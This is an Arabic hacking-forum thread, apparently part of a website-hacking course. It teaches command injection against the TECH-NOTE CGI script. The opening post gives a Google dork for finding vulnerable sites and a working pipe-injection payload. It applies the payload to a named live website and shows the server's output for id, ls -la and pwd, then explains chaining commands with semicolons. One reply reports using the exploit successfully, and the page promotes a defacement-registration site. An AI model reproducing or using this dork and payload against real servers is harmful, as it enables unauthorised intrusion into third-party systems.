استغلال ثغرات Command ExecuTion

استغلال ثغرات Command ExecuTion


النتائج 1 إلى 7 من 7

الموضوع: استغلال ثغرات Command ExecuTion

  1. #1

    New استغلال ثغرات Command ExecuTion


    الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف ASDELY & SCORPION
    =/=/=/=/=/===================================

    استغلال ثغرات Command ExecuTion
    --==/=/=/=/=/=/=============================/
    ثغرات الCommand ExecuTion بالمختصر المفيد هي الثغرات التي تجعلنا نطبق اوامر Linux على السرفر .

    الثغرة اللي سوف نطبق عليها درسنا في سكربت TECH-NOTE
    [+] كود البحث في جوجل : inurl:/cgi-bin/technote
    [+] الاستغلال : main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|id|

    ملاحضة : الحاجة الوحيدة التي يجب تغييرها في الاستغلاله هي كلمة id , ضعو مكانها اي امر لنكس تريدونه (ls -la , uname -a , pwd...)
    الان نبدئ تطبيق هذه الثغرة >>
    اولا نشوفو اي محرك بحث : انا سوف اختار www.google.com
    ثم نكتب كود البحث >> inurl:/cgi-bin/technote
    اوكي كل تمام >> نختار اي موقع من المواق المحصل عليها : http://www.loveject.com/cgi-bin/technote
    الان سوف نطبق الثغرة باضافة الاستغلال >>
    http://www.loveject.com/cgi-bin/technote/main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|id|
    النتيجة :
    ############################
    uid=99(nobody) gid=99(nobody) groups=99(nobody)
    ############################

    لووووول الثغرة شغالة تمام >>
    نشوف اوامر لنكس اخرى :
    |ls -la| النتيجة :
    #############################
    total 1320
    drwxr-xr-x 7 byunghalee byunghalee 4096 May 14 2004 .
    drwxrwxrwx 10 byunghalee byunghalee 4096 Sep 4 2003 ..
    -rwxr-xr-x 1 byunghalee byunghalee 61515 Oct 25 2002 allshop.cgi
    drwxrwxrwx 52 byunghalee byunghalee 4096 May 7 02:33 board
    -rw-r--r-- 1 byunghalee byunghalee 184 Jan 28 2004 chat.gif
    drwxrwxrwx 5 byunghalee byunghalee 4096 Sep 4 2003 config
    -rwxr-xr-x 1 byunghalee byunghalee 17091 Nov 17 2002 config.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 214058 Oct 17 2002 help.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 51242 Jan 28 2004 humor.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 61171 May 30 2003 iboard.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 61171 Jan 28 2004 iboard2004.cgi
    drwxr-xr-x 2 byunghalee byunghalee 4096 Jan 28 2004 iboardicon
    drwxrwxrwx 12 byunghalee byunghalee 4096 Sep 4 2003 image
    -rwxr-xr-x 1 byunghalee byunghalee 86020 Sep 1 2002 index.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 60548 Mar 21 2003 inews.cgi
    -rwxrwxrwx 1 byunghalee byunghalee 21853 Jan 13 2003 info.html
    -rwxr-xr-x 1 byunghalee byunghalee 16696 Jun 30 2003 infor.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 2240 Jan 23 2003 install.cgi
    drwxrwxrwx 2 byunghalee byunghalee 4096 Sep 4 2003 library
    -rwxr-xr-x 1 byunghalee byunghalee 9501 Jun 4 2003 loginform.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 60947 Nov 17 2002 love.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 58058 Jan 27 2003 loveject.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 70726 Oct 17 2002 main.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 38765 Jan 29 2004 news2004.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 81832 Nov 6 2004 print.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 61506 Sep 1 2002 read.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 60694 May 10 2003 sayun.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 56419 Oct 24 2002 shop.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 16432 Sep 1 2002 upgrade.cgi
    -rw-r--r-- 1 byunghalee byunghalee 42416 May 2 2003 ?¹Aü±¸µI¹?¸?AI.html
    ############################

    |pwd| التيجة :
    ##############################
    /wecan/byunghalee/www.loveject.com/cgi-bin/technote
    ###############################

    ملاحضة مهمة جذا : منكم من سوف يتساؤل عن طريقة تطبيق اوامامر متسلسلة , مثلا امر الدخول الى مجلد ثم امر اضهار الملفات حق هذا المجلد >> الطريقة سهلة جدا اذ يكفي فصل الاوامر بعالمة ;
    + مثلا نريد الدخول الى مجلد اسمه config ثم اضهار الملفات حق هذا المجلد >> main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|cd config;ls -la|

    اظن كل شيء واضح , يلا سلام يا شباب >>:D
    انتهى الشرح
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: استغلال ثغرات Command ExecuTion


    I love Yemen




  3. #3

    افتراضي رد: استغلال ثغرات Command ExecuTion

    جزاك الله خير
    اللهم يا سميع يا بصير , يا قريب يا مجيب , يا فعال لما يريد , يا باسط الارض ويا رافع السماء .
    اللهم اصلح حال امتنا الاسلاميه
    ا
    اللهم اغفر لجميع المسلمين والمسلمات والمومنين والمومنات الاحياء منهم والاموات

    اللهم اصلح شباب المسلمين واصلح فتيات المسلمين
    اللهم اصلح شباب المسلمين واصلح فتيات المسلمين
    اللهم اصلح شباب المسلمين واصلح فتيات المسلمين
    اللهم انك عفو تحب العفو فاعفو عنا

  4. #4

    افتراضي رد: استغلال ثغرات Command ExecuTion

    جزاك الله خير هلا والله ومليون غلا تو مانور المنتدى

  5. #5
    هكر مجتهد
    تاريخ التسجيل
    Oct 2009
    الدولة
    مسوي معسكر في منتدى جيوش الهكرز
    المشاركات
    273

    افتراضي رد: استغلال ثغرات Command ExecuTion

    يعطيك آلف عافيه يالغلا
    تقبل مروري المتوآضع


    ،
    للتوآصل
    ،

  6. #6

    افتراضي رد: استغلال ثغرات Command ExecuTion

    الثغره شغاله زى الفل
    وجربتها
    بس فى حاجه وقفت معايا وهى اوامر اللينكس ما فهمتهاش
    شكرا يا غالى

  7. #7

    افتراضي رد: استغلال ثغرات Command ExecuTion

    مشكوووووووووووووووووووووو وووووووووووووووووور يا غالي

المواضيع المتشابهه

  1. شرح استغلال ثغرات Remote File Disclosure
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 9
    آخر مشاركة: 03-16-2012, 09:15 PM
  2. شرح استغلال ثغرات sql injection جاهزه
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 77
    آخر مشاركة: 12-22-2011, 08:27 AM
  3. شرح استغلال ثغرات command execution
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 46
    آخر مشاركة: 12-11-2011, 03:42 PM
  4. استغلال ثغرات file upload
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 68
    آخر مشاركة: 09-18-2011, 07:13 PM
  5. شرح استغلال ثغرات remote file disclousure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 22
    آخر مشاركة: 08-31-2011, 07:25 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •